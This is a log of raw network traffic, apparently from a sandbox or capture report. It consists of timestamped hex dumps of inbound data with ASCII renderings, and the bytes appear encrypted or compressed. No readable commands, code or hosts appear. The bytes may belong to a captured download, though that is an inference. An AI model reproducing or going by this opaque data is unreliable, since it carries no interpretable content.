                                                                                                                                                            2022-09-29 12:45:15 UTC17810INData Raw: ea d6 39 63 87 25 f7 65 df 3d 9a 15 87 77 2f d6 60 91 5a 67 df dc bf 77 40 94 43 4b 48 73 f8 eb 16 71 61 79 49 8e 3a 87 2d 47 24 57 ef 81 4a 04 82 bb a0 13 7d a2 4c 88 fe 75 21 69 e2 fb 68 fb 9c 4f f6 de fb 00 9d e7 3c ce 0e 9b fe 38 e8 90 a5 d9 dd 58 72 49 9b 88 a6 85 bf 51 09 6d db d8 80 9a 72 33 70 9c 31 0c 51 a4 1b 19 5e df b3 17 5e 72 e3 eb ab 8b 9d 6d b0 9a 87 5f 13 4b 74 a9 0d 57 31 37 5e 17 e2 8e 69 14 86 2a 2f df a6 d6 c2 6e 51 fc 86 df 66 8b 5b 62 00 20 4f 02 2a b8 b3 55 cc 55 6e 4e 9b 28 8f 42 72 6d 4c 77 b2 08 87 eb af ed 0f 85 2a dd d8 86 07 b5 58 1e 99 4c e1 d6 4c b4 4e c3 44 72 83 59 1c 16 43 ec cb 12 a3 65 5d 14 bc 3f 77 aa 86 9e 1e 1d b8 00 84 03 7c 40 13 0b 9e 37 e6 7a b0 f2 7e 9e 31 45 3b e8 1c 1f 41 b1 16 1a ca 04 f3 35 dd 16 fc ed 3e
                                                                                                                                                            Data Ascii: 9c%e=w/`Zgw@CKHsqayI:-G$WJ}Lu!ihO<8XrIQmr3p1Q^^rm_KtW17^i*/nQf[b O*UUnN(BrmLw*XLLNDrYCe]?w|@7z~1E;A5>
                                                                                                                                                            2022-09-29 12:45:15 UTC17826INData Raw: 6e 1a a9 87 5a 79 a1 6d 35 ec f9 ab d8 2a de e3 fa 0b fb 8f a9 23 ee 07 24 cf bb dd 28 a6 ef bb 77 c5 33 c6 7a fc 19 0f 25 0d b5 44 df 51 c3 5b 35 ac 93 7a eb 5e 0a 25 ea b6 3a 66 06 33 ba 90 13 b5 2b 8a c7 4b 0b fe 01 b6 39 3f 58 03 86 b1 bc 27 52 84 ea 0d ea 17 a8 88 c6 a9 f2 5d 08 ba 6b 78 fc 13 e2 fb 02 fc b3 ac 3c 0a 92 46 49 c3 15 09 65 c4 ed 7d 69 af 0b f3 3a 10 0a 4e ed b3 30 21 98 e5 b8 c3 18 b1 8d 28 c2 6f 32 ea 22 0a d7 8c a1 95 8a 69 72 b0 06 ff 41 9d 39 09 58 b4 b2 4c 6f 9e 56 db e9 5a bd d3 40 e9 d7 8c f0 6d 6b d4 15 15 db 9b 18 a7 0e 44 da ad 9f 9c a7 6b 90 25 9e 14 19 99 b3 7f e3 9c 93 a0 9f 7e 50 9f b2 ef c7 9a 33 bc 38 b0 cc 43 ce 31 a9 ad 05 35 81 ac 48 32 e8 dc 89 7b 92 0e 1d 03 60 47 14 fa 96 1a e9 82 c2 d4 3c eb 58 8d e3 4b 92 8f ea
                                                                                                                                                            Data Ascii: nZym5*#$(w3z%DQ[5z^%:f3+K9?X'R]kx<FIe}i:N0!(o2"irA9XLoVZ@mkDk%~P38C15H2{`G<XK
                                                                                                                                                            2022-09-29 12:45:15 UTC17842INData Raw: 63 60 be e3 0e 66 20 a6 c2 f8 67 a2 7e 01 fc e3 97 b1 08 86 b4 98 2f 3b 93 fe ce 0d 8d a2 5c 76 46 b9 5b 19 df 68 c8 5f 62 5c fa 72 e1 5a fa 4e 77 72 aa ab 59 01 40 c4 27 3b 18 ce 63 b3 e5 c4 ca 1b 5d 45 cf ef da 1e c8 47 e4 0b 9b c9 c7 5c 6a 2a b3 21 39 a7 b6 61 ad cd 8e d0 88 e9 b5 38 92 1e 7f 56 88 48 8a f5 c5 58 8e 42 ed 1e da 2c 62 b6 65 4b 1a 87 52 94 fd 6d 51 87 1b 14 cf 60 a6 8c 86 3d bb 96 d1 45 25 3a 10 88 1a 51 f8 4e 17 1c 43 1f cc 05 3f 68 21 1b bd 01 25 e2 78 86 fe 19 77 b1 22 d6 a4 e5 3e fe 71 0b 0c ff df fa 2e 21 87 05 11 e8 e1 2d a3 36 89 da ad 70 9d 98 72 07 fb e0 58 47 22 60 45 6d 5a d2 0a 70 5e a4 ab c3 48 21 fc c7 b3 9b c5 89 71 c1 a1 2e b6 ed 8d f6 cd ac 05 49 19 12 1c 15 ee 17 a3 da f2 6a ea 93 3d f4 24 80 d4 25 be c3 b7 cc ce 91 50
                                                                                                                                                            Data Ascii: c`f g~/;\vF[h_b\rZNwrY@';c]EG\j*!9a8VHXB,beKRmQ`=E%:QNC?h!%xw">q.!-6prXG"`EmZp^H!q.Ij=$%P
                                                                                                                                                            2022-09-29 12:45:15 UTC17858INData Raw: 58 c3 55 5f 2f 95 b9 1b 22 1a 8e 85 47 ce af 69 19 61 e1 5c e5 0c aa 9f 1f 77 05 35 42 57 59 23 f7 d6 ca 6a f5 4e 03 ce a9 8c 01 24 27 80 e7 74 9a 76 c1 2c 47 10 55 66 1f d2 17 1f ca 72 6e 24 23 57 92 97 b3 0c 75 1f e7 24 79 a2 00 ba ab c2 37 a2 ba 6c f6 21 47 29 b9 ff a6 0a 00 06 8e 85 26 5d a2 aa 05 7d 1a 8e a5 75 bb 89 14 8b d9 13 3d 0c 3b 0d e2 bb e7 1f ad 15 5f 48 3c aa 45 e1 a1 c0 06 38 b4 cb 6a e0 db 21 e3 21 38 fb 06 50 45 5d 8d 98 ae 33 d3 f1 5d 54 be 96 ac 46 da e9 eb 5b fe e6 0f a2 7f 35 dc 59 78 d0 ae 41 fd 50 d8 65 8a 95 a6 23 f4 11 f9 0d a1 92 17 a9 0e 28 a0 38 67 d3 b3 06 ab 25 57 43 be e4 9b 2f a5 36 8f 37 ed 63 c8 da f5 fb 3e 42 cd 62 b8 ad 96 03 4d 37 99 a1 f6 ad 89 9d 72 cd e8 86 f1 68 7c 86 cf b0 69 16 c8 4c 48 91 6d 6f 87 36 ad 9a 6c
                                                                                                                                                            Data Ascii: XU_/"Gia\w5BWY#jN$'tv,GUfrn$#Wu$y7l!G)&]}u=;_H<E8j!!8PE]3]TF[5YxAPe#(8g%WC/67c>BbM7rh|iLHmo6l
                                                                                                                                                            2022-09-29 12:45:15 UTC17874INData Raw: 82 12 6c b3 ee 8f d6 c8 8c da c4 31 8f 35 76 c4 00 95 63 43 ba a4 1b f4 e4 4f 04 22 a2 04 fd 3f a1 e1 88 ec d0 95 ca 6e 34 42 4c 2a 59 2d ad ad 4c d6 76 9b 7b be a7 17 4e 94 fd 30 3f 3a e5 01 8e 38 5e 67 8f af ff 27 18 08 6e 2c bd 70 a4 b5 f9 1e 53 49 a2 8d 1b 6f 45 82 ab 2d 78 60 45 f9 0d a8 20 68 2a 6c fb 66 fe 48 fe 42 91 30 82 89 2c 08 2f 8d 0f 42 ec 74 9a 9a 0b f5 65 6d 76 04 de 3d 85 93 d0 e1 08 bb fb 6a f5 22 67 cd a2 e5 4c c2 24 b4 0a b7 bd bd 75 b0 67 77 fb 63 f3 b7 72 85 9c a0 48 03 46 c4 c2 66 a1 ed 90 dd f2 73 7a 92 db 3a c5 ea 44 d9 76 b1 73 18 ea 80 54 f2 58 45 60 53 6f dc cb 2a 42 ed 42 8d 37 7a 8d c6 bd e7 98 44 60 c4 2f 53 a3 9a 01 68 3a 0e 47 ce 5e 0c 65 47 39 85 fc 79 b5 da bb 04 a3 bc 37 4f 06 be 21 47 da ce 2a 9e 32 a5 35 6a b6 ca 23
                                                                                                                                                            Data Ascii: l15vcCO"?n4BL*Y-Lv{N0?:8^g'n,pSIoE-x`E h*lfHB0,/Btemv=j"gL$ugwcrHFfsz:DvsTXE`So*BB7zD`/Sh:G^eG9y7O!G*25j#
                                                                                                                                                            2022-09-29 12:45:15 UTC17890INData Raw: 20 2f e6 c0 19 0c 2b 3c 24 31 53 cf aa 0f 50 75 ca a1 2e 4b 68 f4 64 2e 03 22 69 78 08 f3 2d 17 63 1e 24 19 51 b7 e4 80 5f 25 cb 0c b7 b6 e8 60 d7 5d d2 e2 fe 71 15 5b ef b3 45 dd 35 49 f5 9d 8e 6d 8b c6 ea 57 0b 0b a7 a4 6e ac 7b 32 b7 c5 36 cd 12 84 29 d9 12 9b 7d d9 ac 76 5a be a5 96 bb 3d 9f 18 c2 44 a7 43 a3 90 df 6b cb 05 00 6b 48 f3 22 70 c5 6e e8 5d 0f 5e 13 29 1a cf 8b 2d 3c 35 3f c9 7c 20 6e ff 41 24 93 ca 9f 89 65 e0 0f df 80 e7 90 00 c1 f5 25 b3 7d ab c1 70 41 35 d0 a7 93 23 65 a2 52 92 4f c3 8d d0 76 11 bf de bc cc bb 6f a3 a7 15 59 1a e7 08 f6 96 fd 81 e6 5e 45 4c ec 95 ee 86 b6 bf e8 c7 3e 70 b9 90 7f 6e 23 bc 0a 92 25 27 d3 6c 44 ee 5d 7f 69 2a 1e d7 30 a6 f7 f3 42 f5 21 a5 e0 de 44 ef fa f8 91 fa 11 76 31 15 a9 6d 6e 7f 3e b2 a2 d3 69 bf
                                                                                                                                                            Data Ascii: /+<$1SPu.Khd."ix-c$Q_%`]q[E5ImWn{26)}vZ=DCkkH"pn]^)-<5?| nA$e%}pA5#eROvoY^EL>pn#%'lD]i*0B!Dv1mn>i
                                                                                                                                                            2022-09-29 12:45:15 UTC17906INData Raw: 87 83 3e 2d e1 aa f6 00 0d 50 91 4e 04 0b b7 13 12 2a b9 1f 74 95 03 f7 8e 12 89 c5 13 d6 68 59 20 d0 d4 86 db 33 a1 66 0b 5f 85 ba c4 0f 37 57 23 5a 77 37 d3 7c b4 fa 68 93 7d 59 ba 61 d8 83 34 40 ad 89 74 02 85 8f 71 89 1d 32 17 3f f2 70 a1 cd 71 65 61 e3 f6 05 51 18 82 16 06 52 91 b1 71 15 ee 9a 58 10 05 10 88 da 48 67 22 45 39 3e bb 7d 7c 94 b0 ea 4e df bb 1a f3 2c 32 a2 2b d0 e8 5d fb 0b 4f 43 61 aa 63 78 56 95 89 dc df fb 4f 16 76 1f d7 bb d7 d3 bd e3 c4 32 6f c9 14 5d 4b 8f 03 02 d3 a9 43 e2 b9 c0 3f 33 46 77 62 d7 12 1f e3 94 4c 7a 3b 30 8e 2c 24 c6 91 2c 8e 59 c7 ff f8 a2 7b d2 75 28 53 4f 17 39 c8 87 ed 60 25 46 fc f9 cf c2 6f 26 6b 6c 0d e2 02 98 a6 21 3a a6 d7 a3 9d 6d e9 5b 9c d4 18 75 92 fd cf ce bf 53 e8 76 08 a6 e3 ed 64 cd a7 b0 8c 35 9e
                                                                                                                                                            Data Ascii: >-PN*thY 3f_7W#Zw7|h}Ya4@tq2?pqeaQRqXHg"E9>}|N,2+]OCacxVOv2o]KC?3FwbLz;0,$,Y{u(SO9`%Fo&kl!:m[uSvd5
                                                                                                                                                            2022-09-29 12:45:15 UTC17922INData Raw: f1 23 1b 62 ac 04 4b ed 41 72 2f 44 97 4a ed 86 72 5e 62 f6 e5 89 2d af 69 bf 91 e9 99 d4 4f b9 49 bd 55 39 d5 59 ae 1f 73 d1 2c 07 87 16 4c be f9 b3 3c 05 05 fb 12 19 53 9f 1e 40 ca 9a 11 6c 58 24 96 42 e0 9b 0b 70 e7 b4 fb 18 02 88 6e 13 e0 89 4f f6 1f df 2c ce d2 77 3e 09 db 9d a8 4e ff 70 7d 94 e0 93 10 ba 37 2b a1 da c0 25 81 79 83 9d c0 78 9f d7 26 a0 c9 4b db 19 67 25 c1 82 95 2f 11 62 04 37 fa 49 95 17 34 94 9a f3 fb 1f 39 9c 40 41 e0 67 c6 c8 63 70 1f 20 01 99 d6 3e da fd c0 f7 d4 b8 c1 19 26 7f ff 11 12 f3 14 64 e4 a2 ad dd 46 fa 6e 67 37 d8 f9 f1 f3 97 b1 cd 7b 96 5a c8 0d bc 75 9a e9 92 b6 85 9a 66 25 fc 97 bb ad e2 dc f4 90 71 c0 ef 17 d7 89 66 f6 8c 7a da 90 41 79 37 55 43 1e e8 75 43 0d 51 49 bc eb 7b ca 77 c9 10 3d 9f 59 64 b0 d6 f5 9f 4e
                                                                                                                                                            Data Ascii: #bKAr/DJr^b-iOIU9Ys,L<S@lX$BpnO,w>Np}7+%yx&Kg%/b7I49@Agcp >&dFng7{Zuf%qfzAy7UCuCQI{w=YdN
                                                                                                                                                            2022-09-29 12:45:15 UTC17938INData Raw: 24 dc 6d d9 30 fa b1 51 48 33 bc df 7d fc 82 4c 6a fb 37 83 cc 7e 0f 2a 1f 07 ee a3 bd 31 77 11 be 3e 96 a1 f7 fc 7d 37 4e ed d5 44 1b 7b 34 2f b4 3f 3d 2d 27 e1 fd a0 22 0e 68 c8 ba 0a 86 03 8a 42 74 a6 b3 c7 4d 9b 56 f2 a3 63 dd d2 7a 0d 83 29 9e 3a b1 87 0c 76 4d 53 e2 4b 8b 5a 2a 4a bf c5 27 42 71 a0 56 54 57 64 4b 0c eb 8f ee 1c c8 d1 d9 b8 f7 98 51 1e 49 b6 ce 1e c9 f7 23 f9 be eb 60 4f 36 31 29 40 53 b3 88 a0 d6 48 30 d6 8e a6 c5 b6 87 d5 5b fb 8f b8 7b c4 9d 1b 67 6a ca 3b 58 28 f1 b9 76 8c 03 f0 70 44 f6 84 1f a5 28 92 44 9c 23 bc 37 c3 c6 7b 2d 0a 20 6f b6 7e b3 55 b0 bb ed 00 15 88 8f e4 d3 a1 96 22 6f d6 d1 54 c1 a4 8e 98 49 90 8a c1 71 67 8d 45 88 88 05 be 30 3a bc 00 19 08 dd 5c 01 44 90 3b 97 55 aa 73 f8 e6 54 95 a0 bd 66 fe 1d 90 d3 a6 1b
                                                                                                                                                            Data Ascii: $m0QH3}Lj7~*1w>}7ND{4/?=-'"hBtMVcz):vMSKZ*J'BqVTWdKQI#`O61)@SH0[{gj;X(vpD(D#7{- o~U"oTIqgE0:\D;UsTf
                                                                                                                                                            2022-09-29 12:45:15 UTC17954INData Raw: d6 21 03 9b ac b1 e8 55 d5 60 49 a1 97 0c e6 b5 e3 6b 5e 15 72 ec c2 01 42 4c f3 bc 33 7a d0 0a f9 7b c1 56 9c dd b6 e5 02 3c 65 f0 7e 93 cb fc b8 29 86 5f c5 61 09 00 76 42 26 80 d2 3e 0e 25 d9 36 1c 57 b6 5e 87 62 26 af 1c 24 24 79 24 02 0e 85 ea 78 92 c3 a5 5b 15 c3 4e 82 2b 45 18 bf 53 19 a1 02 ae 24 e3 2c 18 45 fd 97 82 62 c0 c5 5a ee 0a c1 48 b5 05 38 16 69 65 64 7e 6c 41 f9 2b ae c7 fd 6d 35 11 a5 69 29 f7 76 6e dd 6c ff a8 7d ac bb 0b b7 d2 d3 ce 54 48 71 21 19 d8 7b 7e c9 39 c9 d2 02 32 c2 16 a5 bd 7e 6d e6 c0 1c 0e 6f cb a9 df 55 db 3a b6 24 42 ee 06 f2 10 f3 88 83 f8 48 ce af d7 1f bb f2 8c d6 e9 28 01 4c 9e cb 6c ae 5f 2e 46 41 13 b5 ef 0e ae 92 5e 2c 51 f6 7c af e5 ea 83 38 8b 1b 18 92 af 54 db f5 12 41 ac a9 1f b7 55 f5 f4 fc 73 b4 11 dc 50
                                                                                                                                                            Data Ascii: !U`Ik^rBL3z{V<e~)_avB&>%6W^b&$$y$x[N+ES$,EbZH8ied~lA+m5i)vnl}THq!{~92~moU:$BH(Ll_.FA^,Q|8TAUsP
                                                                                                                                                            2022-09-29 12:45:15 UTC17970INData Raw: 4b e7 e0 ac e4 1a 7a ba df dd e7 9d ce 07 84 66 a0 51 f1 89 dc f2 4f cd 12 ee 90 fc e6 a4 21 27 46 5d 08 86 cc cf 23 1e 58 dd 5b 1e 93 10 00 53 bc 4d d3 3b c5 9c 6a ca ad 78 1a bd 33 f0 4d 95 6b 31 4e 83 81 fc 51 39 28 42 9a 23 e4 7a fc 65 e1 f5 93 da d4 65 f3 ed a5 e1 0e 33 d4 67 19 67 aa 5b ea 91 bd d3 88 9a f0 52 f0 38 e4 c8 f7 f7 0c ae 4e aa aa a0 ce 34 11 7f da 94 90 ce d0 bc bf bb 96 8d 22 38 c6 97 39 18 fd 1e d4 29 da 71 e3 1c 1f 18 8b 79 c6 29 9f 28 c1 1d a5 db a8 7f 0f aa b2 79 4c 5b 21 cb bb 8a f3 e0 74 93 ec 23 d9 a5 cb 19 ac 53 fc 00 c8 dc 23 e2 4a 6a c8 f7 1e cb f5 51 d7 df 4b 7a 50 a4 c4 36 f3 9e 26 9f 4c 89 b6 e6 23 3b d5 99 6a 4f 72 b4 10 b1 0b f9 21 5d f8 6b 82 be d7 ce a6 48 77 8f ff c0 fc 68 b2 f3 b8 4b a1 af 75 6d 10 d1 79 6e b1 ad 5d
                                                                                                                                                            Data Ascii: KzfQO!'F]#X[SM;jx3Mk1NQ9(B#zee3gg[R8N4"89)qy)(yL[!t#S#JjQKzP6&L#;jOr!]kHwhKumyn]
                                                                                                                                                            2022-09-29 12:45:15 UTC17986INData Raw: 24 68 25 2d 49 76 66 b6 0e 49 ce 94 54 c3 aa c8 7c 80 59 ba 28 99 c9 e4 69 31 0d 05 86 45 61 bd 5d 33 48 d0 89 d6 7c d7 8e 71 14 ca b7 fb f1 6c 2b b4 e9 cb d9 60 57 44 d7 4a db 73 3d 33 1d 31 e6 02 b8 02 38 8d f5 92 a9 a1 e9 f2 59 68 5a dc 1f da 9e a7 98 09 25 c0 5e 45 27 79 67 98 63 df 5f 5b db ba eb 51 38 ab 0d c5 18 99 c5 85 1b 9c e9 fb d4 36 be a3 a8 b8 44 4c bf ff 33 2a 27 56 3d f2 98 1f 32 3c c8 0e 56 5e 8f 21 9d 6f 11 ac 25 51 70 2a 13 44 0b a8 53 9c fb 49 62 ce da 10 e8 29 e2 8c 37 f9 94 ec 22 50 88 84 47 3e f9 9e 6a 90 34 e7 0d 80 d4 ef b7 84 06 7d 53 44 31 af c2 f2 12 60 9c 30 8c b5 76 71 6f 5a 0e e2 e0 76 c9 24 aa e9 5c 67 ec 35 a8 b8 20 01 b1 ab 69 56 76 fa f9 d5 df a1 1d bb 03 f0 84 2e e9 9f 79 8b 94 87 07 a3 e0 0c 5e 6a e7 a2 1d 63 66 84 fd
                                                                                                                                                            Data Ascii: $h%-IvfIT|Y(i1Ea]3H|ql+`WDJs=318YhZ%^E'ygc_[Q86DL3*'V=2<V^!o%Qp*DSIb)7"PG>j4}SD1`0vqoZv$\g5 iVv.y^jcf
                                                                                                                                                            2022-09-29 12:45:15 UTC18002INData Raw: e3 fd ee 08 c3 71 72 00 42 34 cc c7 58 66 ec 00 5f 1d 24 31 5b 18 96 0d df 43 81 9f d5 45 0a 87 35 4a 48 1c a2 87 3c 88 ac db 3f 2a b1 4e 7f 5f 24 3a a0 a6 f3 71 3b 01 36 59 7a 23 0b 10 fd d2 99 5b 64 a8 c0 ea 91 71 23 3a fc 26 2d 4d 41 4e 68 a6 90 23 29 5e bc 42 69 b9 ca c7 5e e2 f6 4d ff cf b0 c8 1a cb ae dd 58 cb 38 70 8a 03 8e a9 23 d8 8d de 76 ae b3 aa 82 88 15 0c d7 28 97 14 8e b1 89 80 0a 7c d5 06 87 e4 d2 d0 77 b1 5a cf 09 01 53 44 51 1a 93 b8 af 92 ed 30 fe 2f a1 94 c9 48 c7 2b 3e bd 0f db e7 ff ff cd 7b ec 91 19 74 be b3 fd 29 1e 48 c7 ba 98 cb db fa 7c 17 bb e4 a3 6c 1e fe 0a c3 1e d3 d5 66 b3 37 8c 0a 59 cf e4 1b 30 1e df e9 43 c4 37 54 1d df 42 46 c0 e5 6d 4c 7f e1 b2 a6 eb 93 26 e3 1f c0 d8 bf d6 14 5b 48 3b 28 79 c4 fb 0c 69 b5 6d d6 0d bb
                                                                                                                                                            Data Ascii: qrB4Xf_$1[CE5JH<?*N_$:q;6Yz#[dq#:&-MANh#)^Bi^MX8p#v(|wZSDQ0/H+>{t)H|lf7Y0C7TBFmL&[H;(yim
                                                                                                                                                            2022-09-29 12:45:15 UTC18018INData Raw: a6 64 c3 81 de 2d b0 2b c6 6a 9d 59 06 f5 ad 1a b4 c0 5f 42 13 7f 7c 6b 3c 19 b9 9e 61 22 e3 bc 07 b2 f4 b8 82 b3 0a ef e4 cf 81 bb c1 19 6d dd 19 85 3e cd 2a 6a 28 1a 9e df 0f ae ef 76 56 8c f0 4a a7 d2 df 2b 75 43 8a 39 75 cd 51 c4 36 c9 9e 84 c5 98 0f 9a e4 12 61 06 bb fd a7 d6 8f f8 f6 25 00 4d d7 e6 2e 57 31 5a 5f a0 24 74 cc 10 dd ea 9a 68 c3 53 3a cc 16 ae 6d b3 72 24 e0 80 18 fa a9 b3 9e e8 fb 78 fc f3 d8 73 88 96 e5 46 3c 1a d8 56 c2 99 c7 b1 bf dc 0d 34 a4 08 b0 f2 5a f8 21 71 ca 28 88 86 63 00 7a 55 42 84 e3 55 78 b6 33 53 14 6b 4d 81 ad df 00 98 cb b0 7e 09 1f 52 4d 17 7a ce 3c 0b 29 8b a8 7c 25 c8 89 74 e9 9a 15 37 c5 69 8c 36 be 0f 08 af 5f a0 ca 07 8f 68 44 30 58 23 0e 07 69 c0 05 d2 4f 88 3f 31 71 9f 3b c8 02 50 4f 84 32 eb 41 37 a0 32 76
                                                                                                                                                            Data Ascii: d-+jY_B|k<a"m>*j(vVJ+uC9uQ6a%M.W1Z_$thS:mr$xsF<V4Z!q(czUBUx3SkM~RMz<)|%t7i6_hD0X#iO?1q;PO2A72v
                                                                                                                                                            2022-09-29 12:45:15 UTC18034INData Raw: 4f 07 f5 c3 f1 14 01 1c 67 f4 6d 14 8a fa ce a8 9f 8f 44 61 9c 05 91 90 f4 bb ed 40 d0 c2 bf 39 b0 23 a1 2e 91 d6 12 4f f5 bf 5b d3 9d a2 89 73 36 8d 60 ab 2f 56 ef 00 8a 90 a0 0a d7 f7 d5 a7 78 6c 4e c2 fa c6 5a c1 05 79 ed 4c 53 83 86 e1 da c1 db 0e 97 1a 8b a5 98 fd 29 e6 f4 8c ce 99 d7 81 d2 d2 24 80 65 32 ba 08 85 b2 52 78 86 87 0a f1 4b e8 82 fb 0f 3d 4a a9 f4 2a 68 be 6f 47 4f e4 63 d7 00 f1 6d 19 77 26 c5 a0 c6 38 cd ce 85 1b df 2a fc d4 3d 17 ae c9 b7 02 01 a8 88 7c c2 ba 45 57 11 1c 77 d5 98 87 99 41 74 4f 7e 82 97 25 b9 de 35 32 e2 bf 2b 8b a9 1c 84 23 af c4 0b a5 57 43 95 9d 32 ab ea 0c b4 03 2b 36 59 3c 67 9b 44 4c 41 57 5b 93 1e 6c 65 d0 7d 85 a9 d9 e8 c1 2a 45 c3 ef 1e da 9b de 46 34 c2 6c 9d ee f0 d3 dd 8a 76 df 9f ac 93 bf 6f 30 70 e7 c6
                                                                                                                                                            Data Ascii: OgmDa@9#.O[s6`/VxlNZyLS)$e2RxK=J*hoGOcmw&8*=|EWwAtO~%52+#WC2+6Y<gDLAW[le}*EF4lvo0p
                                                                                                                                                            2022-09-29 12:45:15 UTC18050INData Raw: bf d1 cc 6b 85 d0 24 0d 27 d0 ab 19 cb 01 ab 6e db da b2 b9 3a 0a 10 c9 84 d3 49 ec 9c de 4f 09 4b c1 6a 11 02 e3 86 13 8b b2 f7 7a 7f 5f a2 ad 5d e4 ee 5e 00 ef 16 81 5f b5 6d b0 c9 e7 01 95 47 97 8f af 90 9c b6 7d 85 b6 3b dd f0 09 61 f4 3a be 4d 65 d9 63 6c 89 9d 59 f9 ea 72 50 7a 99 a3 7c df d3 f7 27 15 b4 80 b5 59 44 7c a4 50 8f 43 8b 64 81 61 d0 03 45 29 a3 db 80 a6 ff 9d 48 36 67 f5 39 aa fb 46 8e de b5 07 53 8a 59 a0 c0 e1 da 35 b0 a6 70 48 14 f4 02 55 cf 14 72 e9 cb e3 9c 43 a1 b7 f4 a5 bb 60 b7 1f 49 4a 46 0e b1 53 2e 1d 83 0a cc 28 23 10 d5 27 ac 20 cb 55 ab 41 74 93 dc 06 11 b9 80 43 23 7e 92 0f 36 b6 6d 95 b7 1f 80 eb 24 5b 4a 31 04 ef b0 d5 4f 3a be fc 88 59 41 5e 4f f7 8a a1 06 53 eb 16 19 c5 8d 27 5b 18 aa 08 b4 1a ae 01 de 29 00 3b 0e 15
                                                                                                                                                            Data Ascii: k$'n:IOKjz_]^_mG};a:MeclYrPz|'YD|PCdaE)H6g9FSY5pHUrC`IJFS.(#' UAtC#~6m$[J1O:YA^OS'[);
                                                                                                                                                            2022-09-29 12:45:15 UTC18066INData Raw: 64 6c 1f 4a c5 e1 23 0f 9c 68 45 ae 16 9a 9b ca 4f 4d e6 48 f9 99 49 55 8d 14 d7 43 c2 33 76 a5 b7 d2 35 fd 2f 2a 2a f8 e0 fb 29 dd 1e 4d 15 1a 41 05 b0 07 f9 5b a9 e7 4b 77 ff 6c 59 07 97 63 ab 46 53 aa 07 27 26 c8 e3 ef 8a a2 8c 11 f8 bf 42 fe 2c 6a 64 0d 99 db c3 8c e5 d0 b3 47 0b 43 98 3a d6 0f 23 b0 c2 46 2a 74 ac e0 32 03 41 b2 8d da 91 6c bc 9e 67 fd 4e d9 6a 7c 7e 47 95 5a 10 6c 5d 68 04 cd d9 12 43 04 3d b7 63 62 a1 d2 ed d1 cf c0 b7 26 7f 6b bf e7 00 c1 95 0b cc 1d 52 22 84 1c ad c2 a1 01 15 a3 d2 90 d2 2e 1e 66 28 56 87 7d 72 27 75 fd e2 50 4e 1f 85 0f 5f dc fd bc d9 93 70 ce af ca 79 71 1f 04 98 53 60 3e 65 28 ad d5 f8 99 71 7c e0 94 b9 27 34 de 1f c3 7b 51 5c 02 ca be 13 b6 d8 90 8a cb 50 42 ee c4 1e 0f 53 16 b8 65 45 31 42 86 a2 32 75 3d d4
                                                                                                                                                            Data Ascii: dlJ#hEOMHIUC3v5/**)MA[KwlYcFS'&B,jdGC:#F*t2AlgNj|~GZl]hC=cb&kR".f(V}r'uPN_pyqS`>e(q|'4{Q\PBSeE1B2u=
                                                                                                                                                            2022-09-29 12:45:15 UTC18082INData Raw: 48 f0 5a 32 d4 12 0e b3 95 4d f7 6b 49 f2 13 d9 62 c7 33 8d 0e ab 4a 50 6c 79 b1 1b a0 c3 c2 12 fe 5d 59 1a 07 2a 3f df 30 0d e3 81 28 23 82 12 7d cc 4b 7e c4 a5 5d 3e 72 df 42 4c c7 a4 9a 07 8e 81 53 64 aa 42 2c 31 e0 09 b8 e6 4d ce 59 16 b6 47 5f fe 51 b0 b9 73 33 af 1b 4b eb e4 74 d5 7d 3b c1 5a 07 13 11 62 07 eb da 5d 4e 9b 2e fd 55 8a 43 55 77 6d 6d 52 20 bb de c4 19 d7 22 ae b9 c7 18 4a 73 be 18 5a ab a5 cb 02 e4 78 5e 0c 93 ea 58 3e d4 20 02 0b bd 69 40 a0 5c 9c f6 ce 3d f9 39 9e a0 5d d3 f2 54 08 14 8b 4f 1a a8 89 a8 1a 25 56 45 f4 11 f7 63 3a c9 e6 1f 8d 41 3c 0c 54 32 d3 13 ba e3 e8 fe 3b 45 92 98 ef e2 5f 17 a6 d6 77 1b 56 b1 ff ba ac 75 0a 0a 85 90 de 2c 80 25 95 a2 e1 a9 61 07 ef 9f db 1b e1 00 c3 13 c0 7e ac 60 1d 55 94 0d 44 31 b2 9e f3 ed
                                                                                                                                                            Data Ascii: HZ2MkIb3JPly]Y*?0(#}K~]>rBLSdB,1MYG_Qs3Kt};Zb]N.UCUwmmR "JsZx^X> i@\=9]TO%VEc:A<T2;E_wVu,%a~`UD1
                                                                                                                                                            2022-09-29 12:45:15 UTC18098INData Raw: eb 60 38 ec 63 24 e9 26 3c b6 e9 36 35 b4 d2 6f 20 d0 eb 98 76 0d cf be 58 54 4a d3 3a 95 7e 15 59 40 a0 9b 8d 1c 6d 17 68 3a 24 5a 9d 4a 01 d9 37 78 f8 f4 2a b4 42 eb 9b 8c 92 ed 8e 32 63 bd c3 1e fc 16 19 d6 60 a2 fd fb f3 d5 54 40 9e 50 e4 af cf b7 47 32 15 90 0d 2e c2 95 37 18 b1 6d ae 9a 72 a8 db 96 3d 7f ce ae f3 80 50 6e 33 65 8b ce 40 6c db 85 d9 77 9c bf 2c de 68 a8 ef dc 7a a3 91 77 26 b2 28 cc 41 25 17 ac a7 62 04 be 4c 01 e2 7e 71 38 ee fa 50 3d 68 be 6b 07 95 71 6a d8 3a 52 2a f6 2e f3 7b dc c4 ae 90 58 e4 df b9 40 e6 ff 17 52 41 58 08 63 02 21 65 0e f3 5b 9a 63 7f 25 94 fc ad 15 d8 b6 1c 82 66 8e 9d a4 32 f2 62 7f 18 02 a5 a2 9a f7 52 59 a4 3f 95 21 f7 4c 27 ba 56 aa 89 f3 c6 ea 5c 7a c8 62 eb ce f3 e5 24 1c 55 ed bd a1 d2 03 6d 32 70 7c 03
                                                                                                                                                            Data Ascii: `8c$&<65o vXTJ:~Y@mh:$ZJ7x*B2c`T@PG2.7mr=Pn3e@lw,hzw&(A%bL~q8P=hkqj:R*.{X@RAXc!e[c%f2bRY?!L'V\zb$Um2p|
